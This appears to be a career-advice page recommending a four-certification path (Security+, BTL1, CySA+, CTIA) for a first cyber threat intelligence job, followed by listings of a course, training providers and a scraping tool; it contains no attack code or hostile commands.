Here’s the 4-cert progression I recommend for landing your first CTI role in 2026 (without burning your savings):
🛡️ CompTIA Security+ — your HR filter pass. CTI sits atop operational security, so the fundamentals (networking, threat vectors, IR) aren’t optional. Get it and move on.
🎯 BTL1 — A 24-hour practical lab where you investigate a live incident, plus a dedicated CTI domain covering strategic, operational, and tactical intelligence. The closest thing to real CTI work you’ll do before being hired.
🧠 CompTIA CySA+ — rounds out the analytical framework underneath the practical work. Sits cleanly on the recognized intelligence analyst career track and proves you can think like a threat analyst.
🔍 EC-Council CTIA — structured around the intelligence lifecycle (planning → collection → analysis → dissemination). Walk into an interview talking that language, and you sound like someone already doing the job.
The biggest mistake I see? Going straight for the GCTI. It’s the industry gold standard, but chasing it before the foundation is like skipping GCSEs (or your SATs if you’re in the U.S.) to apply for a PhD.
Build the base, get some SOC time, then invest!
Feature Course
What Will You Learn?
The basics of cyber threat intelligence (CTI)
Key concepts used within the cyber threat intelligence industry.
How CTI is applied in the real world
Common challenges and how to overcome them.
Learning Resources
Cyber Training
Zero-Point Security: Advanced training in red team operations, adversary simulation, and offensive development.
TCM Academy: A comprehensive suite of courses with a hands-on, practical approach to training that equips students with the real-world skills needed to succeed in cyber.
Blue Cape Security: A specialist in Digital Forensics and Incident Response (DFIR) training, offering courses to take you from complete beginner to expert.
Tools
Octoparse: A no-code solution that will save you time, energy, and money. Let me show you how to use it to build your own custom cyber threat intelligence web-scraping tool!